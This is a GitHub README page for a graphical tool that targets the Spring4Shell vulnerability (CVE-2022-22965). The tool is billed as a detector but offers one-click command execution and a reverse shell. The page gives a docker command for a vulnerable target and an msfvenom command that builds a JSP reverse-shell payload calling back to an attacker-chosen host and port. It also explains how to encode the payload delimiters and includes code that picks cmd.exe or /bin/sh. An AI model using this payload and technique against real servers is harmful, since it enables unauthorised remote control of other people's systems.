GitHub - iloveflag/Fast-CVE-2022-22965: CVE-2022-22965图形化检测工具

靶机

docker run -itd -p 80:8080 vulfocus/spring-core-rce-2022-03-29:latest

反弹shell实质为参照msfvenom

msfvenom -p java/jsp_shell_reverse_tcp LHOST=xxx LPORT=xxx -f raw -o shell.jsp

将jsp url编码后，用

%3C%25替换 %25%7Bc2%7Di 代表<%
%25%3E 替换 %25%7Bsuffix%7Di 代表 %>

代码中针对不同类型服务器进行了shellpath的修改判断

if self.radioButton_win.isChecked():
    shellpath = "cmd.exe"
if self.radioButton_linux.isChecked():
    shellpath = "/bin/sh"

命令执行： whoami探测: 一键反弹shell

Name		Name	Last commit message	Last commit date
Latest commit History 1 Commit
.idea		.idea
__pycache__		__pycache__
build/main		build/main
dist		dist
img		img
README.md		README.md
hackaday.png		hackaday.png
main.py		main.py
main.spec		main.spec
myui.py		myui.py
myui.ui		myui.ui
p.ico		p.ico

Provide feedback